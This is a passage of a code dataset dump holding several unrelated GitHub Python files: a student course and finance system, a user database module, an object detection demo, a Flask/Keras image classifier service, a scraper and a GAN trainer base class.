student.hold = False\n            return (\"Completed!\")\n        return\n\n\n    def unenrollStudent(self, student):\n        if isinstance(student, Student): #Check\n            student.active = False\n            return (\"Completed!\")\n        return\n\n\nclass Student(Person):\n    def __init__(self, name, ssn, year):\n        random.seed(1)\n        super().__init__(name, ssn) #Initialize shared fields via the Person superclass\n        self.year = year\n        self.hold = False\n        self.active = True\n        self.sem = None\n        self.semesters = {}\n        self.account = self.__createStudentAccount() #Create the linked student account\n\n\n    def __str__(self):\n        return(f\"Student({self.name}, {self.id}, {self.year})\") #Student(Name, ID, Year)\n\n\n    __repr__ = __str__\n\n\n    def __createStudentAccount(self):\n        if self.active:\n            return StudentAccount(self)\n        return\n\n\n    @property\n    def id(self):\n        output = \"\"\n        initials_list = self.name.split(\" \") #Splits into each part of name\n        for i in initials_list: #In case of middle names\n            output += str(i[0:1].lower())\n        output += self.ssn[-4:] #Gets last four numbers\n        return(output)\n\n\n    def registerSemester(self):\n        if not self.hold and self.active:\n            self.semesters[len(self.semesters) + 1] = [Semester(len(self.semesters) + 1)] #Key semesters by count; the semester's sem_num matches its key\n            return\n        return(\"Unsuccessful operation\")\n\n\n    def enrollCourse(self, cid, catalog, semester):\n        if self.active and not self.hold:\n            classes = catalog.courseOfferings #Shortcut\n            if cid in classes: #If offered\n                if classes[cid] not in self.semesters[semester][0].courses: #If not already in\n                    self.semesters[semester][0].addCourse(classes[cid]) #Add\n                    self.account.balance += (self.account.ppc * classes[cid].creds) #add to balance\n                    return (\"Course added successfully\")\n                return(\"Course already enrolled\")\n            return(\"Course not found\")\n        return(\"Unsuccessful operation\")\n\n\n    def dropCourse(self, cid, semester):\n        if self.active and not self.hold:\n\n            classCreds = 0\n\n            for i in range(len(self.semesters[semester][0].courses)): #Gets credits for later\n                if self.semesters[semester][0].courses[i].cid == cid:\n                    classCreds = self.semesters[semester][0].courses[i].creds\n\n            x = self.semesters[semester][0].dropCourse(cid)\n            if x is None:\n                self.account.balance -= (self.account.ppc * classCreds) #Refund the course cost\n                return(\"Course dropped successfully\")\n            elif x == \"No such course\":\n                return(\"Course not found\")\n            elif x == \"Invalid course\":\n                return x\n        return(\"Unsuccessful operation\")\n\n\n    def getLoan(self, amount):\n        if not self.hold and self.active:\n            if len(self.semesters) != 0 and self.semesters[1][0].isFullTime: #If full time and has classes\n                newLoan = Loan(amount) #Creates loan\n                if newLoan.loan_id in self.account.loans: #If loan id already exists\n                    self.account.loans[newLoan.loan_id].amount += newLoan.amount\n                else: #Loan id is unique\n                    self.account.loans[newLoan.loan_id] = newLoan\n                return\n            return(\"Not full-time\")\n        return(\"Unsuccessful operation\")\n\n\nclass StudentAccount:\n    def __init__(self, student):\n        self.student = student #Initialize\n        self.balance = 0\n        self.loans = {}\n        self.ppc = 1000\n\n\n    def __str__(self):\n        return(f\"Name: {self.student.name}\\nID: {self.student.id}\\nBalance: ${self.balance}\") # \\n = new line\n\n    __repr__ = __str__\n\n\n    def makePayment(self, amount, loan_id=None):\n        if loan_id is not None: #If using loans\n            if loan_id in self.loans: #If loan exists\n                if amount <= self.loans[loan_id].amount: #If amount is valid\n                    self.balance -= amount\n                    self.loans[loan_id].amount -= amount\n                    return 
self.balance\n return(f\"Loan Balance: {self.loans[loan_id].amount}\")\n return self.loans\n\n self.balance -= amount #No loan\n return self.balance\n\n\n def chargeAccount(self, amount):\n self.balance += amount #Just adds it\n return self.balance\n\n\n######################################################################\n\n\ndef createStudent(person):\n return Student(person.name, person.get_ssn(), \"Freshman\") #Gets values from person and puts them into student (+ freshman)\n\n","repo_name":"hersh-b/Penn-State-Courses-and-Finances-System","sub_path":"MainCode.py","file_name":"MainCode.py","file_ext":"py","file_size_in_byte":9975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25359335543","text":"def stringify(value, replacer=' ', spaces_count=1, _level=1):\n if isinstance(value, str):\n return value\n elif isinstance(value, bool):\n return str(value)\n elif isinstance(value, (int, float)):\n return str(value)\n elif isinstance(value, dict):\n indent = replacer * spaces_count * _level\n result = '{\\n'\n for k, v in value.items():\n result += f'{indent}{k}: '\n result += f'{stringify(v, replacer, spaces_count, _level+1)}\\n'\n result += f'{replacer * spaces_count * (_level - 1)}}}'\n return result\n else:\n raise ValueError(f'Unsupported value type: {type(value)}')\n\nnested = {\n \"string\": \"value\",\n \"boolean\": True,\n \"number\": 5,\n \"dict\": {\n 5: \"number\",\n None: \"None\",\n True: \"boolean\",\n \"value\": \"string\",\n \"nested\": {\n \"boolean\": True,\n \"string\": 'value',\n \"number\": 5,\n None: \"None\",\n },\n },\n}\n\n# nested = {\n# \"string\": \"value\",\n \n# \"dict\": {\n# 5: \"number\",\n \n# \"nested\": {\n# \"string\": 'value',\n# },\n# },\n# }\n\n# primitives_data = {\n# \"string\": \"value\",\n# \"boolean\": True,\n# \"number\": 5,\n# }\n\ndata = { \"hello\": \"world\", \"is\": True, \"nested\": { \"count\": 5 } }\n# data = True \n\n# print(stringify(data, replacer=' ', spaces_count=1))\n\n# print(stringify(primitives_data, '|-', 3))\n\n# a = stringify(\"dsfdc\")\nprint(stringify(nested, '|-', 2))\nprint(type(data))\n","repo_name":"AlexanderLarriva/Stringify","sub_path":"stringify/stringify.py","file_name":"stringify.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"137459766","text":"import pymysql\r\nimport hashlib\r\nimport string\r\nimport json\r\nimport random\r\nimport os\r\nfrom dotenv import load_dotenv\r\n\r\nload_dotenv(dotenv_path=\".envvar\")\r\n\r\nconn = pymysql.connect(\r\n host=os.getenv(\"MYSQL_HOST\"),\r\n passwd=os.getenv(\"MYSQL_PASSWORD\"),\r\n user=os.getenv(\"MYSQL_USER\"),\r\n db=\"user\",\r\n port=int(os.getenv(\"MYSQL_PORT\")),\r\n autocommit=True\r\n)\r\ncursor = conn.cursor()\r\n\r\ndef Get_User(name):\r\n query = \"\"\"SELECT * FROM users WHERE username = %s\"\"\"\r\n cursor.execute(query, [name])\r\n information = cursor.fetchone()\r\n return information\r\n\r\ndef SetPermCreate(name):\r\n query = \"UPDATE users SET permcreate = 1 WHERE (`username` = %s);\"\r\n cursor.execute(query, [name])\r\n conn.commit()\r\n return True\r\n\r\ndef SetAuthentication(name):\r\n query = \"UPDATE users SET `email authorizated` = 1 WHERE (`username` = %s);\"\r\n cursor.execute(query, [name])\r\n conn.commit()\r\n return True\r\n\r\ndef Get_User_Email(email):\r\n query = \"\"\"SELECT * FROM users WHERE email = %s\"\"\"\r\n cursor.execute(query, [email])\r\n information = 
cursor.fetchone()\r\n return information\r\n\r\ndef Get_User_id(id):\r\n query = \"\"\"SELECT * FROM users WHERE id = %s\"\"\"\r\n cursor.execute(query, [id])\r\n information = cursor.fetchone()\r\n return information\r\n\r\ndef Create_User(name, password, email):\r\n createperm = False\r\n reportperm = True\r\n if not Get_User(name) == None:\r\n a = True\r\n return \"Benutzername bereits vergeben!\"\r\n if not Get_User_Email(email) == None:\r\n a = True\r\n return \"Email bereits vergeben!\"\r\n else:\r\n a = False\r\n if a == False:\r\n h = hashlib.new(\"whirlpool\")\r\n stringLength = 16\r\n characters = string.ascii_letters + string.digits + string.punctuation\r\n salt = ''.join(random.choice(characters) for i in range(stringLength))\r\n password = password + salt\r\n h.update(password.encode())\r\n password = h.hexdigest()\r\n query = \"\"\"INSERT INTO users\r\n (username, pwd, email, permcreate, permreport, salt)\r\n VALUES (%s, %s, %s, %s, %s, %s)\"\"\"\r\n values = (name, password, email, createperm, reportperm, salt)\r\n cursor.execute(query, values)\r\n conn.commit()\r\n succesfull = True\r\n else:\r\n succesfull = False\r\n return succesfull\r\n\r\ndef Change_Pwd(name, old_pwd, new_pwd):\r\n information = Get_User(name)\r\n h = hashlib.new(\"whirlpool\")\r\n old_pwd = old_pwd + information[8]\r\n h.update(old_pwd.encode())\r\n old_pwd = h.hexdigest()\r\n if information[2] == old_pwd:\r\n query = \"\"\"UPDATE users SET pwd = %s, salt=%s WHERE username = %s;\"\"\"\r\n h = hashlib.new(\"whirlpool\")\r\n stringLength = 16\r\n characters = string.ascii_letters + string.digits + string.punctuation\r\n salt = ''.join(random.choice(characters) for i in range(stringLength))\r\n new_pwd = new_pwd + salt\r\n h.update(new_pwd.encode())\r\n new_pwd = h.hexdigest()\r\n cursor.execute(query, [new_pwd, salt, name])\r\n succesfull = True\r\n else:\r\n succesfull = False\r\n conn.commit()\r\n return succesfull\r\n\r\ndef Change_Pwd_without_oldpwd(name, new_pwd):\r\n h = hashlib.new(\"whirlpool\")\r\n stringLength = 16\r\n characters = string.ascii_letters + string.digits + string.punctuation\r\n salt = ''.join(random.choice(characters) for i in range(stringLength))\r\n new_pwd = new_pwd + salt\r\n h.update(new_pwd.encode())\r\n new_pwd = h.hexdigest()\r\n query = \"UPDATE users SET pwd = %s, salt = %s WHERE username = %s\"\r\n cursor.execute(query, [new_pwd, salt, name])\r\n conn.commit()\r\n return True\r\n\r\ndef Change_Email(name, email, pwd):\r\n information = Get_User(name)\r\n h = hashlib.new(\"whirlpool\")\r\n pwd = pwd + information[8]\r\n h.update(pwd.encode())\r\n pwd = h.hexdigest()\r\n if information[2] == pwd:\r\n if Get_User_Email(email) == None:\r\n query = \"\"\"UPDATE users SET email = %s WHERE username = %s;\"\"\"\r\n cursor.execute(query, [email, name])\r\n query = \"\"\"UPDATE users SET `email authorizated` = 0 WHERE username = %s;\"\"\"\r\n cursor.execute(query, [name])\r\n conn.commit()\r\n return True\r\n else:\r\n return \"Email bereits vergeben\"\r\n else:\r\n return \"Falsches Passwort\"\r\n\r\ndef Login(name, pwd):\r\n information = Get_User(name)\r\n if information is None:\r\n return False\r\n h = hashlib.new(\"whirlpool\")\r\n pwd = pwd + information[8]\r\n h.update(pwd.encode())\r\n pwd = h.hexdigest()\r\n if not information == None:\r\n if information[2] == pwd:\r\n succesfull = True\r\n else:\r\n succesfull = False\r\n else:\r\n succesfull = False\r\n\r\n return succesfull\r\n\r\ndef Delete_Account(name):\r\n query = \"DELETE FROM `user`.`users` WHERE (`username` 
= %s);\"\r\n cursor.execute(query, [name])\r\n conn.commit()\r\n return True\r\n\r\n# conn.commit()\r\n# conn.close()\r\n","repo_name":"NeonCrafter13/easyvoc","sub_path":"Website/db/userdb.py","file_name":"userdb.py","file_ext":"py","file_size_in_byte":4979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36791160359","text":"import cv2\nimport math\nimport mmcv\nimport numpy as np\nimport os\nimport pdb\nfrom mmcv import Config\nfrom tqdm import tqdm\n\nimport DOTA_devkit.polyiou as polyiou\nfrom mmdet.apis import init_detector, inference_detector, draw_poly_detections\nfrom mmdet.datasets import get_dataset\n\ndota15_colormap = [\n (54, 67, 244),\n (99, 30, 233),\n (176, 39, 156),\n (183, 58, 103),\n (181, 81, 63),\n (243, 150, 33),\n (212, 188, 0),\n (136, 150, 0),\n (80, 175, 76),\n (74, 195, 139),\n (57, 220, 205),\n (59, 235, 255),\n (0, 152, 255),\n (34, 87, 255),\n (72, 85, 121),\n (139, 125, 96)]\n\n\ndef py_cpu_nms_poly_fast_np(dets, thresh):\n obbs = dets[:, 0:-1]\n x1 = np.min(obbs[:, 0::2], axis=1)\n y1 = np.min(obbs[:, 1::2], axis=1)\n x2 = np.max(obbs[:, 0::2], axis=1)\n y2 = np.max(obbs[:, 1::2], axis=1)\n scores = dets[:, 8]\n areas = (x2 - x1 + 1) * (y2 - y1 + 1)\n\n polys = []\n for i in range(len(dets)):\n tm_polygon = polyiou.VectorDouble([dets[i][0], dets[i][1],\n dets[i][2], dets[i][3],\n dets[i][4], dets[i][5],\n dets[i][6], dets[i][7]])\n polys.append(tm_polygon)\n order = scores.argsort()[::-1]\n\n keep = []\n while order.size > 0:\n ovr = []\n i = order[0]\n keep.append(i)\n xx1 = np.maximum(x1[i], x1[order[1:]])\n yy1 = np.maximum(y1[i], y1[order[1:]])\n xx2 = np.minimum(x2[i], x2[order[1:]])\n yy2 = np.minimum(y2[i], y2[order[1:]])\n w = np.maximum(0.0, xx2 - xx1)\n h = np.maximum(0.0, yy2 - yy1)\n hbb_inter = w * h\n hbb_ovr = hbb_inter / (areas[i] + areas[order[1:]] - hbb_inter)\n h_inds = np.where(hbb_ovr > 0)[0]\n tmp_order = order[h_inds + 1]\n for j in range(tmp_order.size):\n iou = polyiou.iou_poly(polys[i], polys[tmp_order[j]])\n hbb_ovr[h_inds[j]] = iou\n\n try:\n if math.isnan(ovr[0]):\n pdb.set_trace()\n except:\n pass\n inds = np.where(hbb_ovr <= thresh)[0]\n order = order[inds + 1]\n return keep\n\n\nclass DetectorModel():\n def __init__(self,\n config_file,\n checkpoint_file):\n # init RoITransformer\n self.config_file = config_file\n self.checkpoint_file = checkpoint_file\n self.cfg = Config.fromfile(self.config_file)\n self.data_test = self.cfg.data['test']\n self.dataset = get_dataset(self.data_test)\n # self.classnames = [\"Boeing737\", \"Boeing777\", \"Boeing747\", \"Boeing787\", \"A320\", \"A220\", \"A330\",\n # \"A350\", \"A321\",\n # \"C919\", \"ARJ21\", \"other-airplane\", \"Passenger Ship\", \"motorboat\", \"fishing boat\", \"tugboat\",\n # \"engineering ship\", \"liquid cargo ship\", \"Dry Cargo Ship\", \"warship\", \"other-ship\", \"small car\", \"bus\",\n # \"cargo truck\",\n # \"dump truck\", \"van\", \"trailer\", \"tractor\", \"truck tractor\", \"excavator\", \"other-vehicle\",\n # \"baseball field\",\n # \"basketball court\", \"football field\", \"tennis court\", \"roundabout\", \"intersection\", \"bridge\"\n # ]\n self.classnames = [\"airplane\", \"ship\", \"vehicle\", \"court\", \"road\"]\n self.model = init_detector(config_file, checkpoint_file, device='cuda:0')\n\n def inference_single(self, imagname, slide_size, chip_size):\n img = mmcv.imread(imagname)\n height, width, channel = img.shape\n slide_h, slide_w = slide_size\n hn, wn = chip_size\n # TODO: check the 
corner case\n # import pdb; pdb.set_trace()\n # total_detections = [np.zeros((0, 9)) for _ in range(len(self.classnames))]\n total_detections = inference_detector(self.model, img)\n # for cls_id, name in enumerate(self.classnames):\n # total_detections[cls_id] = chip_detections[cls_id]\n\n # for i in tqdm(range(int(width / slide_w + 1))):\n # for j in range(int(height / slide_h) + 1):\n # subimg = np.zeros((hn, wn, channel))\n # # print('i: ', i, 'j: ', j)\n # chip = img[j * slide_h:j * slide_h + hn, i * slide_w:i * slide_w + wn, :3]\n # subimg[:chip.shape[0], :chip.shape[1], :] = chip\n #\n # chip_detections = inference_detector(self.model, subimg)\n #\n # # print('result: ', result)\n # for cls_id, name in enumerate(self.classnames):\n # chip_detections[cls_id][:, :8][:, ::2] = chip_detections[cls_id][:, :8][:, ::2] + i * slide_w\n # chip_detections[cls_id][:, :8][:, 1::2] = chip_detections[cls_id][:, :8][:, 1::2] + j * slide_h\n # # import pdb;pdb.set_trace()\n # try:\n # total_detections[cls_id] = np.concatenate((total_detections[cls_id], chip_detections[cls_id]))\n # except:\n # import pdb;\n # pdb.set_trace()\n # nms\n for i in range(len(self.classnames)):\n keep = py_cpu_nms_poly_fast_np(total_detections[i], 0.1)\n # total_detections[i] = total_detections[i][keep]\n return total_detections\n\n def inference_single_vis(self, srcpath, dstpath, slide_size, chip_size):\n detections = self.inference_single(srcpath, slide_size, chip_size)\n img = draw_poly_detections(srcpath, detections, self.classnames, scale=1, threshold=0.2,\n colormap=dota15_colormap)\n cv2.imshow(\"aa\", img)\n cv2.waitKey(0)\n\n\nif __name__ == '__main__':\n model = DetectorModel(\n r\"configs/fair1m/faster_rcnn_obb_r50_fpn_1x_fair1m_few_shot.py\",\n r\"work_dirs/faster_rcnn_obb_r50_fpn_1x_fair1m_5classes_few_shot/epoch_35.pth\")\n\n img_dir = \"/mnt/data/datasets/gaofen/FAIR1M2.0/fair1_1000/val1000/images\"\n out_dir = './output'\n img_names = os.listdir(img_dir)\n for img_name in img_names:\n print(img_name)\n img_path = os.path.join(img_dir, img_name)\n out_path = os.path.join(out_dir, img_name)\n model.inference_single_vis(img_path, out_path, (1000, 1000), (1500, 1500))\n","repo_name":"hakobtt/rotated_detection_few_shot","sub_path":"demo_large_image.py","file_name":"demo_large_image.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"39311916229","text":"import numpy as np\nimport pickle\n\n\nnp.set_printoptions(linewidth=np.inf)\n\n\nwith open('simulation.pickle', 'rb') as f:\n results = pickle.load(f)\n\n\ndata = []\nfor results_ in results:\n x = [list(result.values()) for result in results_]\n x = np.rec.array(x, dtype=[\n ('algorithm', object),\n ('id', object),\n ('calculation_time', float),\n ('drive_time', float),\n ('n_nodes', int),\n ('path', list),\n ('diverge_policy', list),\n ('iterations', int)])\n\n data.append(x)\n\n\ndata = np.array(data)\n\n\nmdp = data[:, np.where(data[0]['algorithm'] == 'MDP')]\nbrtdp = data[:, np.where(data[0]['algorithm'] == 'BRTDP')]\ndstar = data[:, np.where(data[0]['algorithm'] == 'DStar_Lite')]\n\n\nprint(mdp.shape)\nprint(brtdp.shape)\nprint(dstar.shape)\n\n\ndef get_data(algorithm, arr, type_, style=''):\n arr = np.sort(arr, order='n_nodes')\n data = np.percentile(arr[:, 0][type_], [25, 50, 75], axis=0)\n\n if style:\n style = ',' + style\n\n for i, item in enumerate(data.T):\n print(\"\\\\boxplot{%d}{%f}{%f}{%f}\" % (i+1, *item))\n 
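# then emit the median polyline that links the boxes for this algorithm\n    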
print(f\"\\\\addplot[color=black,mark=none{style}] coordinates {{\")\n    for i, item in enumerate(data.T):\n        print(\"(%d,%f)\" % (i+1, item[1]))\n    print(f\"}};\\n\\\\addlegendentry{{{algorithm}}}\")\n    print('')\n\n\nprint(\"===== CALC\")\nget_data('Value Iteration', mdp, 'calculation_time', 'dotted,thick')\nget_data('BRTDP', brtdp, 'calculation_time')\nget_data('D* Lite', dstar, 'calculation_time', 'dashed')\n\nprint(\"===== DRIVE\")\nget_data('Value Iteration', mdp, 'drive_time', 'dotted,thick')\nget_data('BRTDP', brtdp, 'drive_time')\nget_data('D* Lite', dstar, 'drive_time', 'dashed')\n","repo_name":"instance01/osmnx-mdp","sub_path":"osmnx_mdp/extract_for_pgfplots.py","file_name":"extract_for_pgfplots.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
{"seq_id":"27507929918","text":"# https://towardsdatascience.com/deploying-keras-deep-learning-models-with-flask-5da4181436a2\n# https://docs.microsoft.com/en-us/azure/app-service/containers/quickstart-python\n\nimport json\nimport io\nimport numpy as np\nimport h5py\nfrom keras.models import load_model\nimport os.path\nfrom flask import Flask, request\nimport flask\nfrom PIL import Image\nimport tensorflow as tf\nimport base64\n\napp = Flask(__name__)\n\n# 4MB Max image size limit\napp.config['MAX_CONTENT_LENGTH'] = 4 * 1024 * 1024\n\n# class_indices = ['axes', 'boots', 'carabiners', 'crampons', 'gloves', 'hardshell_jackets',\n#                 'harnesses', 'helmets', 'insulated_jackets', 'pulleys', 'rope', 'tents']\n\nclass_indices = ['Apple Granny Smith', 'Apple Red 1', 'Avocado', 'Banana', 'Kiwi', 'Orange', 'Passion Fruit', 'Tamarillo', 'Tomato 2', 'Tomato 4']\n\n\nmodel = None\nglobal graph\ngraph = tf.get_default_graph()\n\n\ndef load_myModel():\n    # load the pre-trained Keras model (a custom fruit classifier here; you can\n    # substitute in your own network just as easily)\n    global model\n    model = load_model('./fruit-model.hdf5')\n\n\ndef scale(image, max_size=(100, 100)):\n    from PIL import Image\n    x, y = image.size\n    size = max(x, y)\n    new_img = Image.new('RGB', (size, size), \"white\")\n    new_img.paste(image, (int((size - x) / 2), int((size - y) / 2)))\n    return new_img.resize(max_size, Image.BICUBIC)\n\n\n@app.route('/')\ndef index():\n    # Doubles as a simple ping test\n    return 'CustomVision.ai model host harness'\n\n\n@app.route('/image', methods=['POST'])\ndef predict_image_handler():\n    try:\n        print('data received')\n        imageData = None\n        if ('imageData' in request.files):\n            imageData = request.files['imageData']\n        else:\n            imageData = io.BytesIO(request.get_data())\n\n        img = Image.open(imageData)\n        img = scale(img)\n\n        data = np.asarray(img).reshape((1, 100, 100, 3))\n        data = data * (1./255)\n\n        # with graph.as_default():\n        #     result = model.predict_classes(data)\n\n        with graph.as_default():\n            predictions = list(model.predict_proba(data))\n\n        if len(predictions) == 0:\n            return 'no results'\n\n        # print(str(result))\n        # return 'completed'\n\n        # results = []\n\n        # results.append({'Tag': class_indices[result[0]], 'Probability': 1})\n        # str(result)\n        # return result\n\n        # rounded = [float(np.round(x,8)) for x in predictions]\n\n        # print(str(rounded))\n        print(predictions)\n        # print(predictions[:,39])\n\n        result = []\n        idx = 0\n        for p in predictions:\n            for i in p:\n                print('idx =' + str(idx))\n                print(i)\n                truncated_probability = np.float64(round(i,8))\n                
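# keep only classes with a non-negligible rounded probability\n                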
if (truncated_probability > 1e-8):\n                    result.append({'Tag': class_indices[idx], 'Probability': i })\n                idx += 1\n\n        sortResponse = sorted(result, key=lambda k: k['Probability'], reverse=True)\n        print(str(sortResponse))\n\n        return str(sortResponse)\n\n        # return \"{\\\"result\\\":\\\"%s\\\"}\" % class_indices[result[0]]\n        # return 'hello world'\n        # return json.dumps(results)\n    except Exception as e:\n        print('EXCEPTION:', str(e))\n        return 'Error processing image', 500\n\n\n# Like the CustomVision.ai Prediction service, the /url route handles URLs\n# in the body of the request of the form:\n#    { 'Url': ''}\n@app.route('/url', methods=['POST'])\ndef predict_url_handler():\n    try:\n        image_url = json.loads(request.get_data())['Url']\n        # results = predict_url(image_url)\n        return \"{\\\"result\\\":\\\"hello world\\\"}\"\n    except Exception as e:\n        print('EXCEPTION:', str(e))\n        return 'Error processing image'\n\n\nif __name__ == '__main__':\n    load_myModel()\n    print('starting server')\n    app.run(host='0.0.0.0', port=8000)\n\n","repo_name":"AzureAdvocateBit/NDC2018-Azure-IoT-Edge-Image-Analysis-with-Bing-Text-to-Speech-1","sub_path":"modules/KerasClassifierService/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"74181124260","text":"class Solution:\n    def arraySign(self, nums: List[int]) -> int:\n        product = 1\n        negatives = 0\n        for num in nums:\n            if num == 0:\n                return 0\n            elif num < 0:\n                negatives += 1\n            product *= num\n        return -1 if negatives % 2 == 1 else 1","repo_name":"AyushAgnihotri2025/CP-Solutions","sub_path":"LeetCode/Python3/Easy/1822. Sign of the Product of an Array/1822-sign-of-the-product-of-an-array.py","file_name":"1822-sign-of-the-product-of-an-array.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"}
{"seq_id":"37080117379","text":"from yarl import URL\n\nfrom ..base_functions.base_functions import log, logger\nfrom ..base_functions.data_classes import DomainItem\nfrom ..client.client import Session\n\n\nclass SaintCrawler:\n    def __init__(self, *, include_id=False, quiet: bool):\n        self.include_id = include_id\n        self.quiet = quiet\n\n    async def fetch(self, session: Session, url: URL):\n        domain_obj = DomainItem(url.host, {})\n        await log(\"Starting scrape of \" + str(url), quiet=self.quiet)\n\n        try:\n            soup = await session.get_BS4(url)\n            link = URL(soup.select_one('video[id=main-video] source').get('src'))\n            await domain_obj.add_to_album(\"Saint Loose Files\", link, url)\n\n        except Exception as e:\n            logger.debug(\"Error encountered while handling %s\", str(url), exc_info=True)\n            await log(\"Error scraping \" + str(url), quiet=self.quiet)\n            logger.debug(e)\n\n        await log(\"Finished scrape of \" + str(url), quiet=self.quiet)\n\n        return domain_obj\n","repo_name":"kkrish2593/CyberDropDownloader","sub_path":"cyberdrop_dl/crawlers/Saint_Spider.py","file_name":"Saint_Spider.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
{"seq_id":"21641865749","text":"import os\nfrom abc import abstractmethod\nfrom pathlib import Path\n\nimport torch\nfrom numpy import inf\n\nfrom logger import TensorboardWriter\n\n\nclass BaseTrainer:\n    \"\"\"\n    Base class for all trainers\n    \"\"\"\n\n    def __init__(self, generator, discriminator, criterions, metric_ftns, optimizerG, optimizerD, config):\n        self.config = 
config\n        self.logger = config.get_logger('trainer', config['trainer']['verbosity'])\n\n        # setup GPU device if available, move model into configured device\n        self.device, device_ids = self._prepare_device(config['n_gpu'])\n        self.generator = generator.to(self.device)\n        self.discriminator = discriminator.to(self.device)\n        if len(device_ids) > 1:\n            self.generator = torch.nn.DataParallel(generator, device_ids=device_ids)\n            self.discriminator = torch.nn.DataParallel(discriminator, device_ids=device_ids)\n\n        self.criterions = criterions\n        self.metric_ftns = metric_ftns\n        self.optimizerG = optimizerG\n        self.optimizerD = optimizerD\n\n        cfg_trainer = config['trainer']\n        self.epochs = cfg_trainer['epochs']\n        self.save_period = cfg_trainer['save_period']\n        self.monitor = cfg_trainer.get('monitor', 'off')\n\n        # configuration to monitor model performance and save best\n        if self.monitor == 'off':\n            self.mnt_mode = 'off'\n            # self.mnt_best = 0\n        else:\n            self.mnt_mode, self.mnt_metric = self.monitor.split()\n            assert self.mnt_mode in ['min', 'max']\n\n            self.mnt_best = inf if self.mnt_mode == 'min' else -inf\n            self.early_stop = cfg_trainer.get('early_stop', inf)\n\n        self.start_epoch = 1\n\n        self.checkpoint_dir = config.save_dir\n\n        # initialize checkpoint file\n        os.mknod(self.checkpoint_dir / \"checkpoint\")\n\n        # setup visualization writer instance\n        self.writer_gen = TensorboardWriter(os.path.join(config.log_dir, \"generator\"), self.logger,\n                                            cfg_trainer['tensorboard'])\n\n        self.writer_dis = TensorboardWriter(os.path.join(config.log_dir, \"discriminator\"), self.logger,\n                                            cfg_trainer['tensorboard'])\n        # self.writer_dreal = TensorboardWriter(os.path.join(config.log_dir, \"d_real\"), self.logger,\n        #                                       cfg_trainer['tensorboard'])\n        # self.writer_dfake = TensorboardWriter(os.path.join(config.log_dir, \"d_fake\"), self.logger,\n        #                                       cfg_trainer['tensorboard'])\n\n        if config.resume is not None:\n            self._resume_checkpoint(config.resume)\n\n    @abstractmethod\n    def _train_epoch(self, epoch):\n        \"\"\"\n        Training logic for an epoch\n\n        :param epoch: Current epoch number\n        \"\"\"\n        raise NotImplementedError\n\n    def train(self):\n        \"\"\"\n        Full training logic\n        \"\"\"\n        not_improved_count = 0\n        for epoch in range(self.start_epoch, self.epochs + 1):\n            result = self._train_epoch(epoch)\n\n            # save logged information into log dict\n            log = {'epoch': epoch}\n            log.update(result)\n\n            # print logged information to the screen\n            for key, value in log.items():\n                self.logger.info('    {:15s}: {}'.format(str(key), value))\n\n            # evaluate model performance according to configured metric, save best checkpoint as model_best\n            best = False\n            if self.mnt_mode != 'off':\n                try:\n                    # check whether model performance improved or not, according to specified metric(mnt_metric)\n                    improved = (self.mnt_mode == 'min' and log[self.mnt_metric] <= self.mnt_best) or \\\n                               (self.mnt_mode == 'max' and log[self.mnt_metric] >= self.mnt_best)\n                except KeyError:\n                    self.logger.warning(\"Warning: Metric '{}' is not found. \"\n                                        \"Model performance monitoring is disabled.\".format(self.mnt_metric))\n                    self.mnt_mode = 'off'\n                    improved = False\n\n                if improved:\n                    self.mnt_best = log[self.mnt_metric]\n                    not_improved_count = 0\n                    best = True\n                else:\n                    not_improved_count += 1\n\n                if not_improved_count > self.early_stop:\n                    self.logger.info(\"Validation performance didn\'t improve for {} epochs. 
\"\n \"Training stops.\".format(self.early_stop))\n break\n\n if epoch % self.save_period == 0:\n self._save_checkpoint(epoch, save_best=best)\n\n def _prepare_device(self, n_gpu_use):\n \"\"\"\n setup GPU device if available, move model into configured device\n \"\"\"\n n_gpu = torch.cuda.device_count()\n if n_gpu_use > 0 and n_gpu == 0:\n self.logger.warning(\"Warning: There\\'s no GPU available on this machine,\"\n \"training will be performed on CPU.\")\n n_gpu_use = 0\n if n_gpu_use > n_gpu:\n self.logger.warning(\"Warning: The number of GPU\\'s configured to use is {}, but only {} are available \"\n \"on this machine.\".format(n_gpu_use, n_gpu))\n n_gpu_use = n_gpu\n device = torch.device('cuda:0' if n_gpu_use > 0 else 'cpu')\n list_ids = list(range(n_gpu_use))\n return device, list_ids\n\n def _save_checkpoint(self, epoch, save_best=False):\n \"\"\"\n Saving checkpoints\n\n :param epoch: current epoch number\n :param log: logging information of the epoch\n :param save_best: if True, rename the saved checkpoint to 'model_best.pth'\n \"\"\"\n netG = type(self.generator).__name__\n stateG = {\n 'arch': netG,\n 'epoch': epoch,\n 'state_dict': self.generator.state_dict(),\n 'optimizer': self.optimizerG.state_dict(),\n 'config': self.config\n }\n filenameG = str(self.checkpoint_dir / 'checkpoint-netG-epoch{}.pth'.format(epoch))\n torch.save(stateG, filenameG)\n\n netD = type(self.discriminator).__name__\n stateD = {\n 'arch': netD,\n 'epoch': epoch,\n 'state_dict': self.discriminator.state_dict(),\n 'optimizer': self.optimizerD.state_dict(),\n 'config': self.config\n }\n filenameD = str(self.checkpoint_dir / 'checkpoint-netD-epoch{}.pth'.format(epoch))\n torch.save(stateD, filenameD)\n\n self.logger.info(\"Saving checkpoint: {} {}...\".format(filenameG, filenameD))\n\n # write model info to checkpoint\n with open(self.checkpoint_dir / \"checkpoint\", \"w\") as f:\n line = \"{}\\n{}\\n\".format(filenameG, filenameD)\n f.write(line)\n\n if save_best:\n best_pathG = str(self.checkpoint_dir / 'model_bestG.pth')\n best_pathD = str(self.checkpoint_dir / 'model_bestD.pth')\n torch.save(stateG, best_pathG)\n torch.save(stateD, best_pathD)\n 